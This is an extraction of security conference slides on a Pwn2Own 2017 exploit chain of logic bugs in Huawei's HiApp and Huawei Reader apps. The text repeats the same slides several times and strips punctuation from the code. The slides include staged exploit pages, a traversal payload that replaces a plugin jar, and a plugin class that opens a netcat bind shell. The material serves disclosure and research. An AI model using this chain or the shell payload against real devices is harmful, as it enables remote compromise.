Upload
others
View
50
Download
0
Embed Size (px)
Citation preview
++
Android Pwn2Owning
Hacktivity 2018
PUBLIC
Introduction
Agenda
bull Background
bull Bug Hunting Approach
bull Tooling Automation
bull Mobile Pwn2Own 2017 Vulnerabilities
bull Demo
2
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PUBLIC
Introduction
Agenda
bull Background
bull Bug Hunting Approach
bull Tooling Automation
bull Mobile Pwn2Own 2017 Vulnerabilities
bull Demo
2
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Agenda
bull Background
bull Bug Hunting Approach
bull Tooling Automation
bull Mobile Pwn2Own 2017 Vulnerabilities
bull Demo
2
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
